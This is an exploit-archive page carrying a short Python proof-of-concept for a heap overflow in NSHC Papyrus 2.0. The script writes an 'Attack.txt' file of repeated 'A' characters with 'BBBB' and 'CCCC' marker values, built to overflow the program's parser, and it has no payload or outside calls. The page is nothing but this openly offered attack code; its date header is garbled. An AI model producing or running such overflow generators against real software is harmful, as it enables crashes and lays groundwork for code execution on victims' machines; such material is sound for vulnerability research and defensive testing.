[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : NSHC Papyrus Heap Overflow Vulnerability
# Published : 2011-08-13
# Author :
# Previous Title : Steam Software Denial of Service Vulnerability
# Next Title : VLC Media Player XSPF Local File Integer overflow in XSPF playlist parser


#!/usr/bin/python
# 
# Title: NSHC Papyrus Heap Overflow Vulnerability 
# Date: 1382011 
# Author: wh1ant
# Software Link: http://file.atfile.com/ftp/data/03/PapyrusSetup.exe
# Version: 2.0 
# Tested On: windows XP SP3 South Korea / windows XP SP3 English VMware Workstation
# CVE: N/A 
# Notice:
# Encrypt/Decrypt programs that are created by NSHC
#
 
fd = open("Attack.txt", "w")
data = 'A'
for i in range(0, 1003):
 fd.write(data)
fd.write("BBBB");
fd.write("CCCC");
for i in range(0, 2000):
 fd.write(data);
fd.close()